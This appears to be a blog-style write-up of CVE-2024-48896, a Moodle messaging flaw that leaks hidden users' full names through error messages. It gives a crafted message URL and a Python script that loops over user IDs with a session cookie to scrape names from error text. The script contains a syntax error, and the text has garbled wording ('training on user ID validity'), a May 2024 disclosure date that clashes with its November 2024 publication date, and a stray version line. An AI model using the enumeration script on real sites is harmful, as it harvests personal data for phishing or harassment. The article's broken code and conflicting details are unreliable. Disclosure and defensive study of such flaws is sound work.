CVE-2024-48896 - Information Disclosure in Moodle Messaging – Exploiting Hidden User Names

Moodle is one of the most popular learning management systems (LMS) used worldwide, supporting millions of learners and teachers. On May 31, 2024, a new vulnerability was disclosed, tracked as CVE-2024-48896. This flaw affects how user names can be exposed through the Messaging system in Moodle. While not giving full account access, this bug can leak the full names of users who should be hidden to certain roles, breaking privacy expectations.

Below, you’ll find a breakdown of what the problem is, how it works, and a simple demonstration of the process for educational and defensive purposes.

What is CVE-2024-48896?

CVE-2024-48896 is an information disclosure vulnerability in Moodle's Messaging system. Under certain configurations, users with the "send message" capability can deliberately trigger an error that leaks the full names of users to whom they should not have access – names that would not be visible based on roles, groups, or privacy settings.

The name returned by the error uses the full name format configured for the Moodle site – meaning that an attacker could collect first names, last names, or even custom name formats if the administrator has set them.

Scenario

Let’s say your Moodle is set up so that teachers in one course are not supposed to see the names of students in another course. However, if those teachers have "send message" capability, they can craft a special request or use the messaging interface in a way that tries to send a message to users outside their group. In doing this, if they purposely access a user ID they shouldn’t, the error message returned by Moodle includes the full name of the user.

Why does this happen?

This happens because training on user ID validity is checked *after* trying to use the target user's data. The resulting error message returns something like:

> "User John Doe (ID: 1234) not found or accessible."

This is a classic "over-sharing" error message – it gives away the very detail that access controls were supposed to keep private.

Exploit Details (With Code Example)

Let’s walk through a proof-of-concept to show how this can be exploited. Important: This is for educational/defensive use with permission and does not include exploitation of any real site.

Step 1: Identify a Target User ID

If you know or can guess a user ID (such as 2, 3, 100, etc.), proceed to the next step.

Step 2: Send a Direct Message via URL

Try to compose a message from the web interface to a user you should NOT be able to contact. Often this will show a generic error.

You can craft a URL like

https://yourmoodlesite.com/message/index.php?user1=YOUR_USER_ID&user2=TARGET_USER_ID

For example

https://school.moodle.edu/message/index.php?user1=14&user2=234

If your permissions are restricted, you’ll get an error like

You cannot message this user: Jane Smith (ID: 234).

Or

User John Doe not found or you do not have permission to message this user.

Even though you can’t contact the user, the site reveals their full name based on the configured name format.

Below is a simple Python snippet using requests to enumerate user names

import requests

base_url = "https://school.moodle.edu/message/index.php";
cookies = {'MoodleSession': 'YOUR_SESSION_COOKIE'}   # Replace with real session cookie

for user_id in range(1, 100):
    params = {
        'user1': '14',      # your user ID
        'user2': str(user_id)
    }
    resp = requests.get(base_url, params=params, cookies=cookies)
    if "You cannot message this user:" in resp.text:
        name = resp.text.split("You cannot message this user:")[1].split(".")[].strip()
        print(f"User ID {user_id}: {name}")

*This code is for defensive/educational research on your own authorized Moodle instance.*

Moodle 4.2.4 and above

It is highly recommended to update immediately to the latest fixed version.

Moodle’s security advisory:
- MSA-24-0013: Information disclosure in messaging error message
- CVE Detail Page: CVE-2024-48896

Limit who gets the "send message" capability via Roles and Permissions.

- Monitor logs for suspicious direct access to /message/index.php.

Conclusion

CVE-2024-48896 is a privacy issue with real-world impact: a user with seemingly limited rights can enumerate the full names of otherwise-protected users just by triggering error responses in the messaging system. This may be leveraged for targeted phishing, harassment, or privacy violation.

Always keep your LMS software up-to-date and review permission settings regularly. Error messages should never reveal information that would otherwise require higher privileges.

Original references

- Moodle security advisory MSA-24-0013
- CVE-2024-48896 at MITRE
- Moodle downloads for updates

Timeline

Published on: 11/18/2024 12:15:18 UTC
Last modified on: 11/20/2024 14:47:12 UTC